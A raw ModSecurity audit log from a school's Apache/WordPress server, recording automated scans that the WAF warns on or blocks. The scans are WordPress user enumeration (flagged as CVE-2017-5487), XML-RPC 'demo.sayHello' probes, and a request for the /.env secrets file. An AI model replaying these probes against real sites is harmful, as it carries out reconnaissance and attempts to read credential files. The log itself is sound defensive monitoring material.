Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7408e410-Z-- --ff754b7f-A-- [05/May/2025:22:24:37 +0700] aBjYNfZJDMuQndL03JNUtwAAAFc 103.236.140.4 49392 103.236.140.4 8181 --ff754b7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ff754b7f-C-- demo.sayHello --ff754b7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff754b7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458677271894 5459 (- - -) Stopwatch2: 1746458677271894 5459; combined=4398, p1=536, p2=3638, p3=36, p4=33, p5=92, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff754b7f-Z-- --55505130-A-- [05/May/2025:22:25:17 +0700] aBjYXYZWvR7-42f6JrAFRgAAAMQ 103.236.140.4 49736 103.236.140.4 8181 --55505130-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --55505130-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55505130-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458717855631 2514 (- - -) Stopwatch2: 1746458717855631 2514; combined=1188, p1=396, p2=763, p3=0, p4=0, p5=29, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55505130-Z-- --00650627-A-- [05/May/2025:22:25:20 +0700] aBjYYIZWvR7-42f6JrAFTAAAANE 103.236.140.4 49760 103.236.140.4 8181 --00650627-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --00650627-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00650627-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458720221064 3226 (- - -) Stopwatch2: 1746458720221064 3226; combined=1272, p1=450, p2=792, p3=0, p4=0, p5=29, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00650627-Z-- --39f3a21a-A-- [05/May/2025:22:25:20 +0700] aBjYYIZWvR7-42f6JrAFTQAAANY 103.236.140.4 49762 103.236.140.4 8181 --39f3a21a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --39f3a21a-C-- demo.sayHello --39f3a21a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --39f3a21a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458720612427 4865 (- - -) Stopwatch2: 1746458720612427 4865; combined=3882, p1=463, p2=3221, p3=22, p4=27, p5=88, sr=69, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39f3a21a-Z-- --97473d64-A-- [05/May/2025:22:25:22 +0700] aBjYYoZWvR7-42f6JrAFUwAAAMU 103.236.140.4 49788 103.236.140.4 8181 --97473d64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --97473d64-C-- demo.sayHello --97473d64-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --97473d64-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458722954269 5716 (- - -) Stopwatch2: 1746458722954269 5716; combined=4213, p1=528, p2=3461, p3=32, p4=36, p5=92, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97473d64-Z-- --b873b830-A-- [05/May/2025:22:25:56 +0700] aBjYhPZJDMuQndL03JNUxQAAAFA 103.236.140.4 50052 103.236.140.4 8181 --b873b830-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b873b830-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b873b830-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458756513925 2981 (- - -) Stopwatch2: 1746458756513925 2981; combined=1281, p1=428, p2=824, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b873b830-Z-- --03b5461b-A-- [05/May/2025:22:25:59 +0700] aBjYh_ZJDMuQndL03JNUywAAAFE 103.236.140.4 50072 103.236.140.4 8181 --03b5461b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --03b5461b-C-- demo.sayHello --03b5461b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --03b5461b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458759359820 6518 (- - -) Stopwatch2: 1746458759359820 6518; combined=4760, p1=596, p2=3927, p3=38, p4=40, p5=94, sr=76, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03b5461b-Z-- --f8fc4531-A-- [05/May/2025:22:26:01 +0700] aBjYiYZWvR7-42f6JrAFiAAAAMg 103.236.140.4 50100 103.236.140.4 8181 --f8fc4531-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f8fc4531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8fc4531-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458761575603 2890 (- - -) Stopwatch2: 1746458761575603 2890; combined=1247, p1=394, p2=820, p3=0, p4=0, p5=33, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8fc4531-Z-- --2ce58c4e-A-- [05/May/2025:22:26:04 +0700] aBjYjARwKNFSM6B7_LaaZQAAAJg 103.236.140.4 50132 103.236.140.4 8181 --2ce58c4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2ce58c4e-C-- demo.sayHello --2ce58c4e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ce58c4e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458764369274 4557 (- - -) Stopwatch2: 1746458764369274 4557; combined=3392, p1=467, p2=2739, p3=26, p4=31, p5=75, sr=94, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ce58c4e-Z-- --90054e78-A-- [05/May/2025:22:26:05 +0700] aBjYjYZWvR7-42f6JrAFigAAANQ 103.236.140.4 50142 103.236.140.4 8181 --90054e78-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90054e78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90054e78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458765566258 2965 (- - -) Stopwatch2: 1746458765566258 2965; combined=1270, p1=417, p2=823, p3=0, p4=0, p5=29, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90054e78-Z-- --5835a815-A-- [05/May/2025:22:26:08 +0700] aBjYkIZWvR7-42f6JrAFkwAAAMM 103.236.140.4 50172 103.236.140.4 8181 --5835a815-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5835a815-C-- demo.sayHello --5835a815-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5835a815-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458768410464 5100 (- - -) Stopwatch2: 1746458768410464 5100; combined=4078, p1=518, p2=3340, p3=33, p4=34, p5=91, sr=82, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5835a815-Z-- --fd894309-A-- [05/May/2025:22:26:13 +0700] aBjYlfZJDMuQndL03JNUzgAAAFU 103.236.140.4 50228 103.236.140.4 8181 --fd894309-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fd894309-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd894309-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458773714505 2515 (- - -) Stopwatch2: 1746458773714505 2515; combined=1135, p1=410, p2=699, p3=0, p4=0, p5=26, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd894309-Z-- --0265c358-A-- [05/May/2025:22:26:16 +0700] aBjYmIZWvR7-42f6JrAFpQAAAM4 103.236.140.4 50252 103.236.140.4 8181 --0265c358-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0265c358-C-- demo.sayHello --0265c358-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0265c358-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458776669389 6915 (- - -) Stopwatch2: 1746458776669389 6915; combined=4964, p1=618, p2=4089, p3=44, p4=43, p5=100, sr=75, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0265c358-Z-- --63d4c537-A-- [05/May/2025:22:26:34 +0700] aBjYqoZWvR7-42f6JrAFvAAAANc 103.236.140.4 50368 103.236.140.4 8181 --63d4c537-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63d4c537-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63d4c537-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458794301027 2986 (- - -) Stopwatch2: 1746458794301027 2986; combined=1317, p1=423, p2=858, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63d4c537-Z-- --316b7914-A-- [05/May/2025:22:26:37 +0700] aBjYrYZWvR7-42f6JrAFvwAAAM4 103.236.140.4 50388 103.236.140.4 8181 --316b7914-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --316b7914-C-- demo.sayHello --316b7914-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --316b7914-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458797324346 5213 (- - -) Stopwatch2: 1746458797324346 5213; combined=4090, p1=531, p2=3323, p3=30, p4=33, p5=101, sr=70, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --316b7914-Z-- --8f1c942b-A-- [05/May/2025:22:27:00 +0700] aBjYxIZWvR7-42f6JrAF3gAAAMk 103.236.140.4 50578 103.236.140.4 8181 --8f1c942b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8f1c942b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f1c942b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458820025742 3006 (- - -) Stopwatch2: 1746458820025742 3006; combined=1331, p1=473, p2=823, p3=0, p4=0, p5=35, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f1c942b-Z-- --5ff8485f-A-- [05/May/2025:22:27:01 +0700] aBjYxfZJDMuQndL03JNU3QAAAE8 103.236.140.4 50588 103.236.140.4 8181 --5ff8485f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.240.206 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.240.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5ff8485f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ff8485f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746458821332774 738 (- - -) Stopwatch2: 1746458821332774 738; combined=313, p1=264, p2=0, p3=0, p4=0, p5=48, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
